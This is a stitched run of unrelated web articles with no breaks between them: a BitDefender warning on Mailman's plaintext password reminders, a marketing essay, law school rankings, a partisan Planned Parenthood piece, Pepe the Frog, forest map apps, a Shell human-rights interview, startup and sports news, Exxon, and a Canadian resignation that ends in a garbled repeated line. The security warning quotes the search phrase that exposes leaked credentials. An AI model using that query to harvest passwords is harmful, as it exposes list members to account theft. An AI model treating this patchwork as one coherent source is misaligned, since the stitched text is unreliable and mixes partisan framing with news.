Distributed under the General Public License (GNU), Mailman is a free software application which is widely used for managing electronic mail discussion and e-newsletter lists. Integrated with the WWW, Mailman runs on GNU/Linux and the majority if Unix-like systems, which made it the favorite pick when it comes to mail list software.
Among many features included in the Mailman application, there's one key point that seems to have become a nightmare. When creating an account, the user gets the (already checked) option to receive a monthly membership reminder which includes their username and password typed in clear text, as shown in the image below:
Fig. 1. Mailing list membership reminder
Now imagine that most mailing lists are public and these reminders are added as actual posts to the mailing lists which are publicly indexable by most of the existing search engines. The result is a massive disclosure of personal information, which can be harvested by miscellaneous bots and spiders and put to malicious use.
A simple query for “mailing list membership reminder” revealed results unveiling users' personal login credentials.
Fig. 2. Search results for: “mailing list membership reminder”
So, if you use Mailman mailing lists, you should immediately change your account password and turn off the monthly notifications.
And if you're a mailing list administrator, you should alter the default settings regarding the monthly password reminders and submit a request to search engines to purge this kind of information from their cache.
Fig. 3. Mailman settings
Try BitDefender Internet Security 2010 for free 30 days!
If you have a kid, or know someone with one, try this experiment in using story elements as a persuasion tactic: Go up to that kid and tell them to go clean their room. Or eat their broccoli at dinnertime. Or go to bed on time, every night, at 8:00 sharp.
How do you think they would react?
Exactly. They would ignore you at best, and be petulant or foul-tempered at worst. The battle of wills with your kid is a time-honored tradition, and it's hit–miss at best. That tradition's been celebrated—or bewailed, really—in this clever take on “Carmina Burana,” and the frustratingly persistent battle to get your kid some shut-eye has resulted in one of the most popular “children's books” of the decade; titled, aptly, Go the F**k to Sleep.
Now for another experiment: After years of experience with my precocious, rambunctious son—who turns five at the end of November—I developed a new attack plan to get him to bed on time. I told him if he was sitting in bed, in his pajamas, his teeth brushed, his face clean, his dinner finished, everything, by 8:15 pm, he'd get three stories read to him, instead of one or two. And then I upped the ante: he could do it like the Flash, his favorite superhero; in other words, do everything super-quick.
The result? Ten to 15 minutes of utter chaos, instead of 45 minutes to an hour, and he'd be in bed all ready for his three stories.
Two things happened there. First, I transformed the go-to-bed routine into an immersive, fun experience for this little guy, and second, I had good stories waiting to be read to him. If I just told him to go the (bleep) to sleep, and read him just one mediocre story, then results would likely be different.
Yes, it's trickery, and in some ways it's subliminal, but at least my boy picks up some healthy habits that'll stay with him for a long time. For now, my little scheme is working.
Getting Back to the Start
One of the most important developmental stages in a person's life is in early childhood. While the specifics of that are up for debate among child behaviorists, psychologists and other-ists, two things become clear: one, that children will constantly test their limits because they're always exploring and learning and we want to channel that energy in positive, productive ways.
And two, that the way in which we interact with our little ones is similar across the board. We make them laugh, we yell at them, we tickle them, we play with them, we tell them stories. And because we are tired parents, we use books as tools to help us.
There are some stories I love reading to my kid at bedtime, because I enjoy telling them using different voices and animated gestures, and also because he really revels in hearing these stories. Those reasons may not be mutually exclusive. For instance, I recently read him “The Pied Piper of Hamelin” and “The Ugly Duckling.” In both cases, he was absolutely enraptured, even frightened at times—but in the end was fixated on every word, staring up at me with moonlike eyes. That validation further encourages me, which further feeds his interest.
Sure, we're talking about tried-and-true classics. But let's consider why they're tried and true: both carry very important moral lessons beneath the surface, yet are still interesting, entertaining, and rewarding. Neither said overtly: “Hey, it's very important that you follow through on your word,” as is the general idea behind the Piper, or “It's not nice to judge people by their appearance,” as is the basic tenet within the Duckling's narrative. While it'd take just five seconds to angrily say those sentences to my kid, and then force him to go to sleep, the message is lost because no one—especially not kids—likes to be told what to do.
The same idea applies to marketing. You must respect your audience's desire to have a good experience. So, invest time and energy in your brand's story because, in the long run, the payoff is great. For me, the reward is my child's overall development, and for you, the reward is brand loyalty.
“A Cannonball from a Pirate Ship!”
We as a civilization figured out that morals and lessons disguised as entertainment work very well in story elements; this trend dates back many centuries. However, with the explosion of children's literature in recent years, I've noticed a veritable increase in the rather preachy children's books along with the fun and entertaining. Consider “The Potty Book for Boys” by Alyssa Satin Capucilli and Dorothy Stott. It's a book about a boy named Henry, who's learning how to go potty. He goes through the veritable challenges—sitting on the potty without anything happening, not making it to the potty on time, and so on—and in the end, he succeeds and everyone is happy, including Henry himself.
It's not a bad book, per se, and we do need to help our kids with stories about others who go through the same struggles as they do. It does rhyme, which gives it points on the entertainment scale. I've read it several times to my son as well, but I don't particularly love it, because it's kind of cheesy and didactic. I feel like it could be told better.
For instance, you know what my son said to me one morning when he was sitting on the toilet? He grunted, and then said in a loud voice with a big grin on his face, “Wow, that was like a cannonball from a pirate ship!”
Toilet humor aside, that's still a story about going to the potty, but now we're getting entertaining here. A cannonball from a pirate ship! Just like pretending to be the Flash when you're trying to get to bed on time. Well, why not? The message's still there and it's still happening. Perhaps one day someone will write a children's book with that analogy (maybe me?); and kids will probably love it.
There's a reason why role-playing, group problem-solving exercises, and team outings are a powerful tool in employee motivation; they're more effective than simply telling your employees—or in your case, your target audience—what to do. Metaphors are a powerful thing; in my case, getting the kid to go to sleep, and in your case, getting that buy-in from your audience.
Doctor Knows Best
Children's book extraordinaire Dr. Seuss was a master at spinning story elements into very readable tales. Consider The Cat in the Hat Comes Back: an entertaining yarn about the Cat in the Hat showing up while two kids are working hard to shovel snow. The Cat makes a mess of everything, including contagious pink stains everywhere which spread to anything that's used to clean it up (including mother's dress and shoes and a broom).
He then summons some help from Little Cats A, B, C, and so on all the way to Z in working with the kids to get the mess cleaned up. It's a fun story, but a deeper look reveals the importance of hard work and persistence. Plus, your kid learns the alphabet.
Another of Dr. Seuss' most popular tales is How the Grinch Stole Christmas. Consider these opening lines:
Every Who down in Whoville liked Christmas a lot, but the Grinch—who lived just north of Whoville—did not. The Grinch hated Christmas—the whole Christmas season. Now, please don't ask why; no one quite knows the reason. It could be, perhaps, that his shoes were too tight. Or it could be that his head wasn't screwed on just right. But I think that the most likely reason of all may have been that his heart was two sizes too small.
So much better than simply: “This book is about Christmas and why you should love it.” As one advocate for youth literacy put it: “Dr. Seuss has helped eradicate those antiseptic and unnaturally clean primers that were the norm for so many years. He was a pioneer for a genre that is the linchpin in helping kids build a critical life skill.”
Dr. Seuss isn't alone in this sense. Look at this list of the top-rated children's books of 2016 as determined by the Telegraph in Britain. It's a veritable list of great stories that lay credence to the importance of not being didactic or preachy. Look at how some of those books are described:
Dave's Cave
“…[Dave's Cave] is both feather light and deeply profound about the human desire to find something better—a better toy, a better house, with a garden and maybe a shed—but also a rough-hewn poem to the joy of what is known, loved and a bit crumpled at the edges.”
Sputnik's Guide to Life on Earth
“…The result is a touching tale, which, with wild humour and panache, confronts a growing child's questions about death, the infinitude of the universe and the baffling fear that things will someday, somehow just end.”
Raymie Nightingale
“…In Raymie Nightingale there is no fantasy, but the story has an air of fable. By the end the heroine does not make sense of the adult world—but, like the reader, she sees it more clearly.”
Note how each book is described as something that, instead of pretending to have all the answers, or even over-simplifying, will appeal to a child and doesn't talk down to them at all.
Maurice Sendak's classic, Where the Wild Things Are, is another example of a powerful story. As one child's writer writes:
[Maurice] Sendak never says, “And so Max realized why getting angry was wrong, and went home and apologized to his mother.” Instead, Sendak simply shows Max fleeing back to his bedroom, where he is overjoyed to see that his mother has left a bowl of steaming soup for him. Without saying anything more, this is how Sendak shows that Max has overcome his anger. It's all subtle: done more with suggestion than direct words. But it's a superb model of how to reveal theme in a story, and it's why the book is a classic.
It's done more with suggestion than direct words. That's the crux of the message right there. Work in some solid entertainment value, as Dr. Seuss and Sendak did, and you have yourself a winner.
Toe the Fine Line
Today's readers, viewers, and listeners, regularly bombarded with several hundred advertisements per day, will understandably build a force field around them to protect themselves, and a consequence of that is shrinking attention span and a very refined bullshit filter. In that same study, you'll note that just 153 out of the 362 ads consumed daily hold the audience's attention for more than a few seconds.
Blame ADHD and MTV all you want. It's not the audience's fault. Rather, it's your responsibility as a marketer to create a story that gives your reader/listener/viewer enough pause, so that they hold off on their usual impulse to scatter like bugs or become petulant and foul-tempered like a so-called disobedient child.
Here's a thought; perhaps your audience is interested, and they want to be surprised. As I suggested earlier, your audience is like a curious child exploring limits and seeing what they can do, only they're much more sophisticated than 5-year-olds.
It's a fine balance, and as a marketer, you need to tread the line carefully. Getting your audience's attention is easy; what's hard is keeping it. The basic fundamental of content marketing is about making your consumers feel that their needs and wants are important. Give them an experience they'll relish. Give them control. My boy loves pretending to be the Flash, so why not incorporate that into the ritual to liven things up? It works like a charm.
It packs real power when you tell an original story with a powerful underlying message that your audience doesn't mind absorbing because they're already rewarded with the high value of entertainment. They say you shouldn't treat others like children. In this case, you should. There's a kid inside everyone who'll pay attention when you have a powerful and interesting story to tell. Maintain that spirit in your story elements, and you'll have a successful content marketing model.
Home Daily News This law school sent the most grads into…
Law Schools
This law school sent the most grads into full-time, long-term legal jobs
The University of Chicago Law School. Jannis Tobias Werner / Shutterstock.com
The University of Chicago Law School sent nearly 91 percent of its 2015 graduates to full-time, long-term legal jobs, earning it a No. 1 spot on a list of the top schools for such employment.
The National Law Journal (sub. req.) reports on its findings, which are based on ABA employment data. Its list was based on the percentage of 2015 law grads employed in full-time, long-term jobs that require bar passage and were not funded by the schools.
The top 10 are:
1) University of Chicago Law School (90.82 percent)
2) University of Pennsylvania Law School (89.84 percent)
3) Cornell Law School (89.62 percent)
4) Duke Law School (88.94 percent)
5) New York University School of Law (87.42 percent)
6) Columbia Law School (87.17 percent)
7) Harvard Law School (85.91 percent)
8) University of California at Berkeley School of Law (85.25 percent)
9) Stanford Law School (85.13 percent)
10) University of Michigan Law School (85.03 percent)
Yale Law School was No. 14, but it was No. 1 on a list of law schools that sent the most grads to federal clerkships. It was followed by Stanford Law School, Harvard Law School, the University of Virginia School of Law and the University of Chicago Law School.
At the opposite end of the spectrum, Southwestern Law School topped a list of the law schools with the highest percentage of 2015 graduates who were seeking jobs but had not found employment 10 months after graduation. It was followed by Florida Coastal School of Law, Santa Clara University School of Law, Liberty University School of Law and the Thomas Jefferson School of Law.
See also:
ABAJournal.com: “These law schools top rankings that focus on quality legal jobs”
Planned Parenthood president Cecile Richards urged women Tuesday to push the pro-abortion movement to the next level by publicly bragging about their own abortions, saying the next step is get rid of the “stigma and shame” surrounding abortion.
“I think it's time for us to be bold,” Richards said at a women's conference in California. “And so I want to ask you to do something or think about doing something. And that is to share your own story. This is the time to do it.”
Ticking off a list of stories women should tell in order to rid the practice of killing unborn babies of an unwanted negative stigma, Richards said it's important for women to speak publicly about their visits to Planned Parenthood clinics, and their experience with abortion. (RELATED: The New York Times Op-Ed On Late-term Abortion, Fixed)
“Maybe you had a pregnancy and you had to make a decision,” she said. “And thank goodness you could make that decision in consultation with your doctor and with your family, and not your member of Congress. Those stories are important to share, because you'll never know the thousands of women that you give courage to or comfort to because you shared your story.”
The politics of abortion won't change until people are convinced that killing unborn babies is “just part of life,” Richards said. Their attitudes have to change, and the culture has to change, so that it's considered acceptable to violently end the life of a fetus in the womb if the unborn baby is unwanted by his or her mother.
“It's something that we have to get rid of stigma and shame about,” Richards said. “And so if we do that, I think we can make progress.”
Many pro-abortion activists have already embraced Richards' suggested tactic, but it has been met with mixed reviews by others who are pro-abortion but do not think the practice should be celebrated. Actress Lena Dunham ticked off pretty much everyone when she told a podcast audience in December she hasn't yet had an abortion, but wishes she had the opportunity.
“It's a difficult decision for all women, and, while some have the procedure without any emotional baggage, many women feel conflicted about terminating a pregnancy,” one woman wrote in The Daily Beast, revealing a divide over the tactic even among pro-abortion activists. “Dunham's flippant attitude is insulting to women who have actually gone through it.”
Follow Rachel on Twitter
Send tips to rachel@ dailycallernewsfoundation.org.
Content created by The Daily Caller News Foundation is available without charge to any eligible news publisher that can provide a large audience. For licensing opportunities of our original content, please contact licensing@dailycallernewsfoundation.org.
The creator of Pepe the Frog, whose smiling green cartoon mug has been embraced by the alt-right movement and Donald Trump supporters this election, is voting for Hillary Clinton.
"I'm voting for Hillary for sure. I was a big fan of Bernie, but that fizzled out, so I'm all Hillary 2016," artist Matt Furie told Esquire in an article published Wednesday.
Furie first introduced Pepe to the Internet in "Boy's Club" cartoons in 2005 as a mischievous frog that looks perpetually stoned. Only later was it picked up by Internet trolls using the online community 4chan, who took the character to a whole new oftentimes inappropriate level, which Wednesday earned it a place on the Anti-Defamation League's list of hate symbols.
The artists blame the recent escalation of Pepe-related material, some of it racist and anti-Semitic, on Trump's candidacy.
"I've seen outrageous stuff involving Pepe online before, but I try not to dwell on it. I blame Trump for all of this, because he kind of looks like this smug Pepe meme. Now it's just this runaway train," he said.
Furie laments that his name is now attached to the meme his amphibian creation has become on the Web, but admitted there's not much he can do to reclaim his copyrighted character.
"Pepe the Frog is copyrighted by me. But, I'm not sure if copyright laws have caught up to the wild west of the Internet," Furie said.
When asked whether he could create a Clinton-equivalent character to Trump's Pepe, Furie said it was "really weird" that his work has become part of the national political conversation.
"Someone sent me a clip of Hillary addressing Pepe and the affiliation with white nationalists, and someone in the crowd yelled 'Pepe!'" Furie said. "So that for me is just very strange that on either side — Trump or Clinton — had to sit down at a meeting and decide what are we going to do with this Pepe thing? It's funny that it's become part of the national debate. It's really weird."
A couple of weeks ago this site posted a checklist of equipment recommendations for mushroom forays. In the comments to that post, Mike Dechter alerted us to the following:
“On the Coconino and Kaibab National Forests, you can get GPS-enabled maps of the forest on smartphones, tablets, and Garmin GPS devices.
You can get step-by-step instructions on how to do this on the Coconino NF website here: http://go.usa.gov/PEa.
Basically, with this tool I never need to carry paper maps, compass, or other orienteering tools. Allows me more room for those mushrooms I find!
Let me know if you need any information on this tool. I helped produce the data and maps for the Coconino.”
I downloaded the software and maps that Mike suggested, and was very impressed to see how useful this new application is. The Forest Service should get a pat on the back for embracing the capabilities of the smartphone for the benefit of their visitors. I think any Arizona mushroom forager who owns a compatible device will want to get this product. I was able to successfully install maps from several other national forests in Arizona in addition to the Coconino N.F. link above, as shown below.
The iPhone app used for this purpose is called PDF Maps Mobile App, published by Avenza Inc. It works with a vast number of maps, both free and purchased, published by the U.S. Forest Service and many other entities. After installing the app, you download the map via an Internet connection– either on Wi-Fi or over your cellular data link– and the app stores it in your phone's memory so you can continue to use it with your phone's GPS receiver even when you don't have cell service.
Avenza provides a tutorial YouTube video that gives a good overview of the workflow and capabilities of this program:
The first step in the process is to install the free PDF Maps app via the iTunes store on your computer:
You can also install it directly from the App Store utility app on your iPhone or iPad:
If you have an Android device, Mike has posted a set of online instructions at the Coconino National Forest web site showing you how to do the same thing via the Google Play Store. Moreover, these maps can also be viewed on your computer or installed on a Garmin GPS receiver.
Once the software is successfully installed, you can start downloading maps. To begin with, use your Safari browser app to go to the link that Mike posted previously on the Coconino National Forest site, and choose the maps you want to install.
At this point, you'll see the selected map begin downloading into your smart phone, and then undergoing some processing before you can open it. From the Advanced Options selection on each map's information page, you have the option of choosing high or low resolution storage, depending on how much of your memory you'll want to devote to the map. The low resolution maps save space, and are probably adequate for navigation, but are not as esthetically pleasing as the high resolution versions. You can also set a global option from the Settings tab to choose high or low resolution for all maps that offer the choice.
You can use a bar code reader like Red Laser to follow the link from the bar codes posted on the information page. If you do that, or if you choose to type in a URL address manually, or if you download your map via Dropbox or iTunes, you'll be asked to choose what program you want to use to open the map. Choose “Open in PDF Maps”:
The Kaibab National Forest and Prescott National Forest motor vehicle use maps are also available for free in a similar manner. For many other forests, at this point, you'll need to go to the Avenza web site and pay a very modest amount for them. Of particular note, the Avenza site has excellent, detailed color visitor maps for the Apache and Sitgreaves National Forests, in addition to the Coconino and Prescott forests.
You open the Avenza store directly from the PDF Maps app, after you push the “+” icon to add a new map. You'll need to set up an account to download maps from the site, and to bill your iTunes account for add-on maps that require you to pay a fee, but it's all reasonably straightforward once you get to their web site. The variety of maps from all over the world is astonishing.
In the following picture, you can see snapshots from USFS maps showing Knoll Lake on the Mogollon Rim and the Inner Basin of the San Francisco Peaks, both on the Coconino National Forest, and Greens Peak on the Apache and Kendrick Peak on the Kaibab. Click the image for a more magnified view of the fine detail on most of these maps (other than the bare-bones, black-and-white motor vehicle/road map of the Kaibab forest.)
One other type of map that will be of great interest to mushroom hunters is the nationwide topo map series based on the US Geological Survey 7.5-minute quadrangles. These show elevations and gradients, unlike the USFS forest visitor and motor vehicle use maps shown above. They also show more fine-grained details of things like foot trails, springs, and buildings.
It's not a bad idea to have both types of map available for the area where you are foraging, and at only 99 cents per quadrangle from the Avenza store, you can cover our favored hunting grounds for the price of a couple of lunches. Here's what it looked like when I bought the Prescott quadrangle:
Some Forest Service web sites even have their own versions of these public-domain topographical quadrangle maps available for free. The collection of topo maps for the Kaibab National Forest is particularly good.
Once you build up a collection of maps, it can become rather confusing to keep track of them. Therefore, PDF Maps allow you to edit the map names, and organize them in folders, using the “Edit” button:
The PDF Maps app also provides a number of capable tools for use on your maps. You can measure distances, search for landmarks, search for longitude/latitude coordinates, save a track of your path, and more.
One feature that will clearly appeal to our readers is the ability to drop place-marker pins on your maps, record their coordinates, and connect them to geotagged photographs taken in the vicinity. Very useful for saving the location of mushrooms one has discovered. This particular one was the biggest I ever found….
So what advantages do Avenza provide over dedicated GPS apps like MotionX-GPS? There are several. Most importantly, these maps include Forest Service road numbers for ease of navigation, as well as other Forest Service-specific information about road closures, camping sites, and other important details. And there is a much wider variety of other organizations and agencies issuing their own unique maps that can be used with it. It's also a lot quicker and easier to use, based on my experience with both systems.
Mike Dechter and his colleagues at the USFS are to be commended for giving us this robust yet easy way of planning our trips, tracking ourselves on the map, and saving records of where we were and what we found. Highly recommended!
Share this: Email
Print
Facebook
LinkedIn
Reddit
Twitter
Google
Tumblr
Pinterest
WhatsApp
Skype
This is a rush transcript. Copy may not be in its final form.
JUAN GONZALEZ: The Supreme Court will hear oral arguments Tuesday on whether corporations can be sued in U.S. courts for human rights abuses committed overseas. The case centers on a lawsuit that accuses the oil giant Shell's parent company, Royal Dutch Petroleum, of complicity in the murder and torture of Nigerian activists. In 1995, nine Nigerian activists, including Ken Saro-Wiwa, were executed by the Nigerian military government for protesting Shell's exploration and development in the Niger Delta. The families of the seven Nigerians killed are seeking to hold Shell liable under a 1789 U.S. law called the Alien Tort Statute. A separate suit involving Ken Saro-Wiwa's family was settled in 2009, when Shell agreed to pay $15.5 million.
AMY GOODMAN: Some legal analysts are comparing this case, Kiobel v. Royal Dutch Petroleum, to the landmark campaign finance ruling in Citizens United. In 2010, the Supreme Court ruled corporations have broad rights under the First Amendment and can directly fund political campaigns. The Court is now being asked to decide if corporations have the same responsibilities as individuals for violations of international law. The Court's ruling will also impact numerous other human rights cases being heard by lower courts.
Joining us in Washington, D.C., is Marco Simons, legal director of EarthRights International. EarthRights has filed a “friend of the court” brief in this case and has been a pioneer in using the Alien Tort Statute to sue corporations for human rights abuses in Burma, Nigeria, Colombia and other countries.
Marco, explain the significance of the Supreme Court hearing the oral arguments on Tuesday.
MARCO SIMONS: Yeah, so this case is really about whether a corporation that participates in serious human rights abuses, such as crimes against humanity or genocide or state-sponsored torture, can profit from those abuses and shield those profits from the victims when the victims come to take them to court. It's essentially about whether corporations are immune from any kind of liability for serious human rights abuses worldwide. And that's what the Court of Appeals held in this case. They said under no circumstances can a corporation ever be sued for the most serious human rights violations today.
So, a corporation that engages in slave trading, for example, that traffics in persons, that retains the profits of all those activities, they can shield the profits from their victims. They wouldn't be reachable in U.S. federal court. And we think that whatever you think about the Citizens United ruling, whether it was correct or not, it should be clear after that ruling that if corporations have rights on the same basis as human beings, then they should have responsibilities, as well. And one of those responsibilities is to respect human rights worldwide.
JUAN GONZALEZ: Now, this case is also being heard by the Court in tandem with another case, Mohamad v. The Palestinian Authority. Could you talk about that one?
MARCO SIMONS: Sure. The Mohamad case was filed under a related statute, which is known as the Torture Victim Protection Act. The Alien Tort Statute allows foreigners to come into U.S. courts to vindicate their rights. The Torture Victim Protection Act was passed by Congress in 1992 to allow U.S. citizens similar rights to sue for torture and extrajudicial killings. In this case, the victim was a U.S. citizen who was tortured and killed by agents of the Palestinian Authority and the PLO in the West Bank. And the issue in that case is whether organizations, including corporations, but in this case the Palestinian Authority, whether organizations can be sued under the Torture Victim Protection Act. So it presents the question of whether U.S. citizens will enjoy similar rights to aliens or foreigners, when they come into court to sue corporations for human rights abuses such as torture and extrajudicial killings.
AMY GOODMAN: Can you explain, Marco Simons, exactly what the Nigerian case is, the case of the nine Nigerian rights activists in 2000—in 1995, who were executed by the Nigerian military, and what that had to do with Shell?
MARCO SIMONS: Yeah, this case arose out of a conflict in the Niger Delta in the early to mid-1990s, where the Ogoni people, an ethnic group in the Niger Delta, organized a nonviolent protest movement to oppose the practices of Shell, which had been drilling oil in their lands in a very environmentally destructive manner for decades. And the Ogoni protested this environmental destruction and the economic disruption that oil development on their lands had caused. And the response from both Shell and the Nigerian government, which was a brutal military dictatorship at that time, was a very violent response.
The allegations in this case are that Shell paid the Nigerian military, that they called in the Nigerian military to respond to peaceful protests, knowing full well that extremely violent reactions would occur, and that they specifically participated in this trial against these nine Ogoni activists, including Ken Saro-Wiwa and Barinem Kiobel, whose family is the lead plaintiffs in this case at the Supreme Court. And they actually bribed witnesses against Dr. Kiobel and Ken Saro-Wiwa in order to ensure that they were convicted in this trial that was condemned internationally by all kinds of world leaders, including the U.S. president, Bill Clinton, at the time, and the British prime minister, and that ultimately led to the execution of these activists. And so, Shell is—
AMY GOODMAN: I wanted to turn for a moment to Ken Saro-Wiwa himself, in his own words. In 2009, oil giant Shell reached an out-of-court settlement with the family of the executed Nigerian writer/environmentalist for $15.5 million. The landmark trial investigated Shell's alleged involvement in human rights violations in the Niger Delta, including its complicity in Saro-Wiwa's torture and execution. He was a famous writer in Nigeria, founding member and president of the Movement for the Survival of the Ogoni People, or MOSOP. I got a chance to interview him, along with WBAI's Bernard White, back in 1994 and 1995, when he came to the United States before he returned to Nigeria, was arrested and then killed.
KEN SARO-WIWA: Shell does not want to negotiate with the Ogoni people. Each time they've come under pressure from local people, their want has always been to run to the Nigerian government and to say to the Nigerian government, “Oil is 90 percent of your foreign exchange earning. If anything happens to oil, your economy will be destroyed. Therefore, you must go and deal with these people, these troublemakers.” And most times, the government will oblige them and visit local communities of poor, dispossessed people with a lot of violence.
And when these communities then protested and said, “Look. Look at the amount of violence that is being used against us, even though we are only protesting peacefully,” then the oil companies will come and say, “Well, there is no way we can determine how much violence a government decides to use against its own people.” So, basically, the local communities have no leverage with the oil companies at all.
AMY GOODMAN: That was Ken Saro-Wiwa on Pacifica Radio station WBAI in New York, just before he returned to Nigeria, was arrested, tried with eight other minority rights activists, and was executed on November 10, 1995. Marco Simon, final comment about the significance of the Supreme Court hearing of the oral arguments on Tuesday?
MARCO SIMONS: Yeah, the significance is simply this: if you are violating human rights, is it really the case that all you need to do in order to shield your profits from the victims is to form a corporation? Because that really seems to be contrary to the basic principles that we hold dear in this country and around the world.
AMY GOODMAN: And the connection between Royal Dutch Shell and Shell Corporation here in the United States?
MARCO SIMONS: Royal Dutch Shell and Shell Oil here are essentially the same corporation. Royal Dutch Shell is the parent. It's the—Shell Oil here in the U.S. is one of their subsidiaries, as was Shell in Nigeria, the company that was directly involved in the Ogoni crisis.
AMY GOODMAN: Marco Simons, legal director of EarthRights International, thanks so much for being with us.
MARCO SIMONS: Thank you.
We know that artificial intelligence will soon reshape our world. But which companies will lead the way? To help ­answer that question, research firm CB Insights recently selected the “AI 100,” a list of the 100 most promising artificial intelligence startups ­globally. The private companies were chosen (from a pool of over 1,650 candidates) by CB Insights' Mosaic algorithm, based on factors like financing history, investor quality, business category, and momentum. A look at the 50 largest startups on the list, ranked by total funds raised, shows that investment in AI is surging worldwide. But, for now at least, the U.S. appears to be leading the revolution.
Click here to enlarge the graphic.
Chart shows locations and funding for AI startups Nicolas Rapp
A version of this article appears in the March 1, 2017 issue of Fortune with the headline “Betting on AI.”
THE HOME-GROWN PLAYER CAME TO AN AGREEMENT TO STAY ANOTHER YEAR Saúl renews until 2021 The midfielder signed his new contract that will link him with our club until the 2020-21 season.
Saúl Ñíguez has extended his contractual relationship with our club until 30th June 2021. The player from the ranks reached an agreement with the club to extend their relationship for another season and signed his new contract. The midfielder was very happy with the reached agreement: "I'm very happy to be able to continue defending this shirt," he said after the signing.
Atlético's midfielder came to the red and white Academy in 2007 and moved up to debut with 16 years in the reserve team. He made the first team with his debut in the Europa League against Besiktas on 8th March 2012. After a year on loan at Rayo Vallecano (2013-14), he returned last season and played a great year, becoming a key element in the first team this season. He has played a total of 45 games, scoring 8 goals in all competitions, some as decisive as the one scored against Bayern Munich in the first leg of the Champions League semi-finals at the Vicente Calderón. His great performances have made him be included in the preliminary list of 25 players called by Vicente del Bosque for the Euro 2016 in France.
Jose Luis Perez Caminero stated his satisfaction with the agreement reached: "We are all very happy with the agreement reached with Saúl. He is an excellent football player, who has been trained in our Academy and who reinforces our commitment to the home-grown players. He is at a great moment, but he will still grow much more because he has huge potential."
"America First" is the mantra that guided Donald Trump during his entire presidential campaign.
Ironically, Rex Tillerson, Trump's pick for the top post in his cabinet, took a decidedly different approach as he led America's largest oil cmpany.
During Tillerson's decade in charge, ExxonMobil (XOM) was more focused on pumping oil in far-flung places like Russia and the deepwaters off Africa to see the revolutionary U.S. shale oil boom that was happening right at home. In the process, Exxon didn't embrace one of the biggest influxes of energy jobs that the country has ever seen.
"Exxon missed out on shale. They dismissed it, didn't take it seriously," said Fadel Gheit, a veteran energy analyst who covers Exxon at Oppenheimer.
Tillerson, who is leaving after a decade in charge, has admitted Exxon was late to the shale party.
"What's gone on here in North America, has been, I think, nothing short of extraordinary. And I would be less than honest if I were to say to you we saw it all coming, because we did not, quite frankly," Tillerson said in a June 2012 speech at the Council on Foreign Relations.
Tillerson said Exxon "grossly underestimated" the amount of shale oil in the U.S. and new technology's ability to affordably pump it. In many ways, ExxonMobil (XOM) CEO's legacy is tainted by his failure to believe in the American energy revolution.
Related: Exxon would win if Tillerson helps lift Russian sanctions
All of this means Exxon did not fully participate in the oil jobs boom either. Goldman Sachs has estimated that the shale oil and gas revolution created roughly 233,000 jobs between mid-2009 and late 2014.
However, Exxon's U.S. workforce didn't expand much during that period. The company has said it employed just over 31,300 workers in 2014, compared with nearly 29,900 in 2009.
As of the end of 2015, nearly 60% of Exxon's 73,500 total workers are employed outside of the U.S.
It stands to reason that by missing out on shale and focusing overseas, Exxon did more hiring in foreign countries like Nigeria, Russia, Canada and Kazakhstan than in the Bakken oilfields of North Dakota or deep in Texas.
That's another irony given Trump's shaming of Ford (F), Carrier (UTX), and other U.S. companies for shipping jobs overseas.
In a statement, Exxon noted that it is the largest U.S. producer of natural gas and has invested billions of dollars along the Gulf Coast.
"These investments will not only expand refining and chemical manufacturing capacity, but also bring economic growth and create jobs," Exxon said.
Exxon said that Gulf Coast investments such as an expansion of its Beaumont polyethylene plant could create more than 28,000 temporary construction jobs and more than 1,200 permanent jobs over the next few years.
Still, Tillerson's focus on searching for oil in Russia and elsewhere also runs counter to Trump's promise for "complete American energy independence."
"America's incredible energy potential remains untapped. It's a wound that is totally self-inflicted," Trump said in a May speech. "Imagine a world in which our foes, and the oil cartels, can no longer use energy as a weapon." Trump blamed President Obama for keeping America "dependent on others."
Tillerson seems to have a different view here. The Exxon man said in his 2012 speech that some fears about energy security are "not well-founded in fact." As long as it's reliable, Tillerson said "where it comes from should be of little consequence to us."
Related: The problem with Rex Tillerson's Exxon nest egg
To be fair, Exxon and Tillerson aren't alone in missing the shale boom. Saudi Arabia and OPEC were also caught badly off guard by the explosion of American oil and more recently by how resilient U.S. frackers have become.
Exxon did eventually get into shale, but at a heavy cost. Exxon paid $41 billion in 2010 to acquire XTO Energy, a major natural gas producer that today also pumps lots of shale oil from Texas and North Dakota.
However, even Tillerson later admitted the XTO deal was poorly timed because it occurred just after natural gas prices peaked and they've never recovered.
Chevron (CVX) was also slow to hop on the shale train. However, analysts say Chevron has made more inroads with shale than Exxon since then.
The problem for oil giants like Exxon and Chevron is they are so gigantic that it would take a ton of fracking to really move the needle. So they focused on hitting the jackpot by finding a large overseas discovery rather than setting up hundreds of wells in U.S. shale fields.
Sign up for CNNMoney's morning market newsletter: Before The Bell
Of course, U.S. production skyrocketed from a mere 4 million barrels per day in September 2005 to a peak of 9.6 million in April 2015, making it one of the world's top energy producing nations.
Instead, Exxon ceded the shale game to more nimble players such as EOG Resources (EOG) and Continental Resources (CLR), which is run by vocal Trump supporter Harold Hamm.
Because they saw the writing on the wall early, those pioneers are generating far bigger production gains today than Exxon -- and virtually all of it is coming from shale.
"They were the first movers so they were able to snap up strong acreage at better pricing," said Stewart Glickman, energy analyst at CFRA Research.
"The large companies like Exxon have been playing catchup."
--CNNMoney's Chris Isidore contributed to this report.
Aboriginal Affairs Minister John Duncan has resigned from cabinet over contacting a tax court judge on behalf of a constituent, the MP for Vancouver Island North announced in a written statement late Friday afternoon.
"In June of 2011, I wrote a character reference letter to the Tax Court of Canada on behalf of an individual to whom my constituency staff was providing casework assistance on a Canada Revenue Agency matter," said Duncan.
The letter, which he says originated from his riding office in Vancouver Island North, surfaced after cabinet members were recently asked to review all of their correspondence.
The directive came following revelations that Finance Minister Jim Flaherty had improperly tried to influence the Canadian Radio-television and Telecommunications Commission on behalf of an Ontario-riding radio station's bid to obtain a new licence.
Harper cabinet departures John Duncan's resignation as aboriginal affairs minister makes him the fifth member of Stephen Harper's cabinet to leave amid controversy. Here's a look at the others: 2012 - Bev Oda resigns as minister of international co-operation and an MP after months of controversy over her travel expenses.
resigns as minister of international co-operation and an MP after months of controversy over her travel expenses. 2010 - Helena Guergis resigns as minister of state for the status of women after allegations about her conduct and that of her husband, ex-MP Rahim Jaffer. Harper also removed her from the Conservative caucus, and she was defeated by the Conservative candidate in the 2011 election. Guergis sued Harper and several others over the matter but her suit was dismissed by a judge. Guergis has appealed the decision.
